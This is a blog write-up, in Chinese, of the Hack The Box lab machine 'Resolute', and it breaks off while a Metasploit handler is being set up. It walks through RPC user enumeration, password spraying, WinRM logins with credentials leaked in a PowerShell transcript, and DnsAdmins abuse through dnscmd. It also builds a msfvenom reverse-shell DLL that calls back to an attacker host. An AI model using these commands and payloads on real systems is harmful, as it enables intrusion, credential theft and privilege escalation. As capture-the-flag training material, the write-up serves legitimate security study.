title: Hack The Box - Resolute(密码喷涂并基于远程DLL注入DNS服务获取SYSTEM shell) author: World'sEnd layout: true categories: 内网安全 tags:
• 打靶日记
Don't let your future self hate your present self.
不要让未来的你,讨厌现在的自己。
Hack The Box - Resolute
# Nmap 7.92 scan initiated Sat Apr 23 17:10:45 2022 as: nmap -sC -sV -T4 -Pn -p- -oA nmap.txt 10.10.10.169
Nmap scan report for 10.10.10.169
Host is up (0.48s latency).
Not shown: 65512 closed tcp ports (reset)
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-23 09:32:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49712/tcp open msrpc Microsoft Windows RPC
50105/tcp open tcpwrapped
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h26m59s, deviation: 4h02m30s, median: 6m59s
| smb2-time:
| date: 2022-04-23T09:33:06
|_ start_date: 2022-04-23T09:16:10
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2022-04-23T02:33:02-07:00
| smb-security-mode:
| account_used:
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 23 17:26:25 2022 -- 1 IP address (1 host up) scanned in 940.01 secondsDNS协议:
Nmap为我枚举出了megabank.local,但是按惯例来讲目标应该还存有resolute.local,我可以试试:
$ dig @10.10.10.169 megabank.local
; <<>> DiG 9.18.0-2-Debian <<>> @10.10.10.169 megabank.local
; (1 server found)
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 20763
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;megabank.local. IN A
;; ANSWER SECTION:
megabank.local. 600 IN A 10.10.10.169
;; Query time: 187 msec
;; SERVER: 10.10.10.169#53(10.10.10.169) (UDP)
;; WHEN: Sat Apr 23 17:31:30 CST 2022
;; MSG SIZE rcvd: 59但是我错了:
$ dig @10.10.10.169 resolute.local
; <<>> DiG 9.18.0-2-Debian <<>> @10.10.10.169 resolute.local
; (1 server found)
;; global options: +cmd
;; connection timed out; no servers could be reached他并没有该域,看来这次或许会反常一点。我还是会尝试区域传输,尽管它从来没成功过:
$ dig axfr @10.10.10.169 megabank.local
; <<>> DiG 9.18.0-2-Debian <<>> axfr @10.10.10.169 megabank.local
; (1 server found)
;; global options: +cmd
; Transfer failed.RCP端口:
RPC端口即使现在我依然觉得它很神秘,哪怕现在我也只知道它能用来做哪些,但我还是无法预估它具体能用来做哪些,做多少。我可以尝试匿名链接:
$ rpcclient -U "" -N 10.10.10.169
rpcclient $> 看起来它允许我匿名访问,那么我可以尝试枚举目标一些信息:
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]就这样我获取到了一些用户名,可以用来去枚举kerberos协议用户名,但是如果我想知道用户更多的信息:
rpcclient $> querydispinfo
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: (null) Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: (null) Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: (null) Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: (null) Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: (null) Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: (null) Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null) Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: (null) Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: (null) Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: (null) Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: (null) Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: (null) Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: (null) Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: (null) Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: (null) Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: (null) Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: (null) Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null) Desc: (null)
rpcclient $> 为了阅读方便,我把重要的信息截了出来:
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!我尝试登录目标,不可以:
$ evil-winrm -i 10.10.10.169 -u marco -p 'Welcome123!'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1LDAP端口:
ldapsearch这工具虽然我还是不会用,但是我找到了个替补选项,Nmap有一些默认的LDAP脚本,LDAP查询返回的垃圾信息也很多,我只放部分与目标相关的,以满足下对LDAP的好奇心:
$ sudo nmap -sT -Pn -n --open 10.10.10.169 -p389 --script ldap-rootdse
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-23 17:56 CST
Nmap scan report for 10.10.10.169
Host is up (0.17s latency).
PORT STATE SERVICE
389/tcp open ldap
| ldap-rootdse:
| LDAP Results
| <ROOT>
| currentTime: 20220423100354.0Z
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=megabank,DC=local
| dsServiceName: CN=NTDS Settings,CN=RESOLUTE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=megabank,DC=local
| namingContexts: DC=megabank,DC=local
| namingContexts: CN=Configuration,DC=megabank,DC=local
| namingContexts: CN=Schema,CN=Configuration,DC=megabank,DC=local
| namingContexts: DC=DomainDnsZones,DC=megabank,DC=local
| namingContexts: DC=ForestDnsZones,DC=megabank,DC=local
| defaultNamingContext: DC=megabank,DC=local
| schemaNamingContext: CN=Schema,CN=Configuration,DC=megabank,DC=local
| configurationNamingContext: CN=Configuration,DC=megabank,DC=local
| rootDomainNamingContext: DC=megabank,DC=local
......
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| highestCommittedUSN: 151908
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| dnsHostName: Resolute.megabank.local
| ldapServiceName: megabank.local:resolute$@MEGABANK.LOCAL
| serverName: CN=RESOLUTE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=megabank,DC=local
......
| isSynchronized: TRUE
| isGlobalCatalogReady: TRUE
| domainFunctionality: 7
| forestFunctionality: 7
|_ domainControllerFunctionality: 7
Service Info: Host: RESOLUTE; OS: Windows
Nmap done: 1 IP address (1 host up) scanned in 2.12 seconds它似乎是有一个子域:
resolute$@MEGABANK.LOCALSMB端口:
遗憾的是,目标不允许匿名访问共享:
$ smbclient -N -L \\10.10.10.169
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.169 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available或许我可以试试通过RPC得到的口令:
$ crackmapexec smb 10.10.10.169 -u marco -p 'Welcome123!' --continue-on-success
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marco:Welcome123! STATUS_LOGON_FAILURE它也不可以。其他端口我觉得我没必要写,因为它没什么内容,尤其是两个http服务端口,都是not found。即使强行爆破一下,也是什么都没有的:
$ dirsearch -u http://10.10.10.169:5985/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/worldisend/.dirsearch/reports/10.10.10.169-5985/-_22-04-23_17-51-44.txt
Error Log: /home/worldisend/.dirsearch/logs/errors-22-04-23_17-51-44.log
Target: http://10.10.10.169:5985/
[17:51:45] Starting:
[17:51:51] 403 - 312B - /%2e%2e//google.com
[17:52:25] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[17:54:23] 405 - 0B - /wsman
Task Completed kerberos端口:
我可以将从RPC枚举到的用户名提取做成一本字典,这里不需要枚举了,因为RPC本身就是从目标机器中查询出来的用户,这些用户本就是存在的。
Administrator
Guest
krbtgt
DefaultAccount
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki我试着去枚举目标中保存有AS-REP的哈希:
$ ../toolbox/impacket-0.9.24/examples/GetNPUsers.py 'MEGABANK.LOCAL/' -usersfile ./users.txt -format hashcat -outputfile hashes.txt -dc-ip 10.10.10.169
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User ryan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marko doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sunita doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User abigail doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marcus doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sally doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fred doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User angela doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User felicia doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User gustavo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ulf doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User stevie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User claire doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paulo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User steve doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User annette doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User annika doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User per doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User claude doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User melanie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User zach doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User simon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User naoki doesn't have UF_DONT_REQUIRE_PREAUTH set但是我失败了,一条哈希都没有。没想到这次我竟然这么快就进入了死胡同,因为我现在只有一堆用户名和一个口令。
密码喷涂:
还是我局限了在目标机器中有个标签”Password Spraying“,即密码喷涂的意思,它类似于暴力破解,但不同的是,密码喷涂是拥有口令之后,对不同的用户名进行枚举猜解,从而获取完整的合法账户凭证,我可以借助SMB共享来间接的确定这一点,信息也有很多,我会截出关键的,因为它实在太明显了:
$ crackmapexec smb 10.10.10.169 -u ./users.txt -p 'Welcome123!' --continue-on-success
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\Administrator:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\simon:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\naoki:Welcome123! STATUS_LOGON_FAILURE 倒数第四条信息,看起来我获取的口令是与melanie匹配的。
以melanie身份登录目标并获取user.txt:
我可以试着去登录目标:
$ evil-winrm -i 10.10.10.169 -u melanie -p 'Welcome123!'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents> 我成功了,并且我获取到了user.txt:
*Evil-WinRM* PS C:\Users\melanie\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\melanie\desktop> ls
Directory: C:\Users\melanie\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/23/2022 2:16 AM 34 user.txt
*Evil-WinRM* PS C:\Users\melanie\desktop> type user.txt域侦察:
当前用户没什么权限:
*Evil-WinRM* PS C:\Users\melanie\desktop> whoami /pirv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\melanie\desktop> 我可以看一眼详细信息:
*Evil-WinRM* PS C:\Users\melanie> net user melanie
User name melanie
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 4/23/2022 4:53:03 AM
Password expires Never
Password changeable 4/24/2022 4:53:03 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\melanie> 没什么信息,我可以看一眼它的组信息:
*Evil-WinRM* PS C:\Users\melanie> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
*Evil-WinRM* PS C:\Users\melanie> 没什么有用的,用户目录也没有什么有用的信息,在Users目录中会有一个ryan目录,该用户我觉得需要留意一下,最起码相比其他用户,这个用户是切切实实被用来登录过目标机器的:
*Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/25/2019 10:43 AM Administrator
d----- 12/4/2019 2:46 AM melanie
d-r--- 11/20/2016 6:39 PM Public
d----- 9/27/2019 7:05 AM ryan
*Evil-WinRM* PS C:\Users>
在根中,我发现了一些隐藏目录:
*Evil-WinRM* PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
*Evil-WinRM* PS C:\> ls -force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 4/23/2022 2:15 AM 402653184 pagefile.sys
*Evil-WinRM* PS C:\> PSTranscripts可不像是一个计算机本该有的目录,在它下边确实会有一个隐藏目录:
*Evil-WinRM* PS C:\> cd PSTranscripts
*Evil-WinRM* PS C:\PSTranscripts> ls
*Evil-WinRM* PS C:\PSTranscripts> ls -force
Directory: C:\PSTranscripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--h-- 12/3/2019 6:45 AM 20191203
*Evil-WinRM* PS C:\PSTranscripts> 在隐藏目录中还会有一个隐藏文本文件:
*Evil-WinRM* PS C:\PSTranscripts> cd 20191203
*Evil-WinRM* PS C:\PSTranscripts\20191203> dir
*Evil-WinRM* PS C:\PSTranscripts\20191203> ls -force
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt我可以试着去看一眼,我删除了一些不必要的:
*Evil-WinRM* PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
......
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
......
**********************
**********************
......
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
......
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
......
*Evil-WinRM* PS C:\PSTranscripts\20191203>文本里边多次提到一个看起来像是一串密码的字符串"Serv3r4Admin4cc123!",还有用户"ryan"。
以ryan身份登录:
我可以试着用ryan登录:
$ evil-winrm -i 10.10.10.169 -u ryan -p Serv3r4Admin4cc123!
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents> 在ryan桌面有个笔记,里边记载了一些信息:
*Evil-WinRM* PS C:\Users\ryan\desktop> ls
Directory: C:\Users\ryan\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/3/2019 7:34 AM 155 note.txt
*Evil-WinRM* PS C:\Users\ryan\desktop> type note.txt
Email to team:
- due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute
*Evil-WinRM* PS C:\Users\ryan\desktop> 由于变更冻结的原因,系统变更(除管理员账户变更外)会在1分钟内自动恢复。算是一个提醒,但对于当下的我还没明白它对我有什么利弊。
当前用户没什么特殊权限:
*Evil-WinRM* PS C:\Users\ryan\desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled我可以看一下它的具体信息:
*Evil-WinRM* PS C:\Users\ryan\desktop> net user ryan
User name ryan
Full Name Ryan Bertrand
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 4/23/2022 4:52:02 AM
Password expires Never
Password changeable 4/24/2022 4:52:02 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *Contractors
The command completed successfully.
*Evil-WinRM* PS C:\Users\ryan\desktop> 它并不在远程管理组中,那为什么我能远程登录到它呢?
*Evil-WinRM* PS C:\Users\ryan\desktop> net localgroup "Remote Management Users"
Alias name Remote Management Users
Comment Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.
Members
-------------------------------------------------------------------------------
Contractors
melanie
The command completed successfully.
*Evil-WinRM* PS C:\Users\ryan\desktop> 哦,ryan在Contractors里,而Contractors在远程管理组中,所以我才能远程登录。不过并不重要。我可以看一眼ryan用户详细组:
*Evil-WinRM* PS C:\Users\ryan\desktop> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
*Evil-WinRM* PS C:\Users\ryan\desktop> ryan在DnsAdmins 组里,这个组看着像权限挺大的。Microsoft 文档将此 DnsAdmins 描述为:DNSAdmins 组的成员可以访问网络 DNS 信息。默认权限如下:允许:读取、写入、创建所有子对象、删除子对象、特殊权限。
在谷歌中不断搜索。我发现了这篇文章:
https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/我可以截一些关键的信息:
在本目标中,DNS服务就位于域控上,如果我将包含载荷的DLL注入到DNS服务器进程中,那么回连的会话便会是域控的会话,如果我能将DLL注入到系统进程中,那么回连的会话也是系统级别的。关于DLL注入,在我博客的C语言学习笔记中有提到过一些细节,这里我就不写了。
至于dnscmd,很简单,我只需要运行一下 -h 确定当前目标有没有即可,回显信息有很多,我只列一些,它位于system下,通常该目录下的exe都具有系统环境变量:
*Evil-WinRM* PS C:\Users\ryan\desktop> dnscmd -h
Usage: DnsCmd <ServerName> <Command> [<Command Parameters>]
<ServerName>:
IP address or host name -- remote or local DNS server
. -- DNS server on local machine
<Command>:
/Info -- Get server information
/Config -- Reset server or zone configuration
/EnumZones -- Enumerate zones
/Statistics -- Query/clear server statistics data
......首先我可以生成dll载荷,目标操作系统版本在前边crackmapexec已经为我枚举出来了,windows 2016 x64:
$ sudo msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.7 LPORT=1337 -f dll -o whoami.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 8704 bytes
Saved as: whoami.dll我还是选择meterpreter会话,或许可能需要其他一些功能,meterpreter方便很多:
msf-pro > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf-pro exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/shell_reverse_tcp
msf-pro exploit(multi/handler) > set lport 1337
lport => 1337
msf-pro exploit(multi/handler) > set LHOST 10.10.16.7
